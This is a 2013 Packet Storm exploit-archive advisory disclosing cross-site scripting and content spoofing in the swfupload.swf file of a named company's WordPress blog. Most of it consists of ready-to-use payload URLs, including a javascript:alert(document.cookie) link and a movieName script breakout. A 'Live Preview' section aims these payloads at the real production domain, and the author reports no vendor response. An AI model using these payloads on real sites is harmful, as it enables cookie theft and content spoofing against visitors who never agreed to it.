exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Redtube Blog Cross Site Scripting

Redtube Blog Cross Site Scripting
Posted Jun 7, 2013
Authored by Ryuzaki Lawlet

The Redtube official blog suffers from a cross site scripting vulnerability. The author has received no response from the owner once reporting this issue.

tags | exploit, xss
SHA-256 | bf3e341e19ca11d4c98eb5882fab31af5f8c4727a0a9c315a87690786521fdc4

Redtube Blog Cross Site Scripting

Change Mirror Download
#########################################################
# Title : Cross Site Scripting in RedTube Official Blog.
# Author : Ryuzaki Lawlet
# Blog  : justryuz.blogspot.com / www.justryuz.com
# E-mail : ryuzaki_l@y7mail.com / justryuz@facebook.com / justryuz@linuxmail.org
# Date: June 6/2013 (4.44 pm)
# Vendor: https://wordpress.org/plugins/nextgen-gallery/
# Type : Web Apps
# Vector of operation: Remote
# Impact: Cross Site Scripting & Content Spoofing
# Tested on : Ubuntu / Window XP
##########################################################

*Description:

The vulnerability is caused due to insufficient input validation in the parameter
“movieName” and "buttonText" in the script to swfupload.swf “ExternalInterface.call ()”. This can be
exploited to execute arbitrary HTML and script code in a user’s browser session in
context of an affected site.

There are two vulnerabilities in RedTube Official Blog.

*Content Spoofing

https://[victim]/Wordpress/wp-includes/js/swfupload/swfupload.swf?buttonText=test<img src='https://i.imgur.com/ltp2L8N.jpg'>

It's possible to inject text, images and html (e.g. for link injection).

*Cross-Site Scripting

https://[victim]/Wordpress/wp-includes/js/swfupload/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a>
or
https://[victim]/Wordpress/wp-includes/js/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert("xss");//

Code will execute after click. It's strictly social XSS.

*Proof of Concept Code

https://[victim]/Wordpress/wp-includes/js/swfupload/swfupload.swf?movieName=[XSS]
https://[victim]/Wordpress/wp-includes/js/swfupload/swfupload.swf?buttonText=testbuttonText=test<img src='https://i.imgur.com/ltp2L8N.jpg'>

*Live Preview
https://blog.redtube.com/wp-includes/js/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert("xss");//
https://blog.redtube.com/wp-includes/js/swfupload/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a>
https://blog.redtube.com/wp-includes/js/swfupload/swfupload.swf?buttonText=test<img src='https://i.imgur.com/ltp2L8N.jpg'>

*Screenshot
https://fbcdn-sphotos-b-a.akamaihd.net/hphotos-ak-ash4/182547_425615577534257_1920413802_n.jpg


*Solution:
On the server side, you can upgrade to a non-vulnerable version. Onthe client
you can use a browser that obeys the Content-Type header specified by the server, such as Mozilla Firefox, Google Chrome, Apple Safari or Opera.
Internet Explorer 8 with the XSS Filter won't execute the malicious scripts.

Reff: https://justryuz.blogspot.com/2013/05/title-cross-site-scripting-in-redtube.html
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close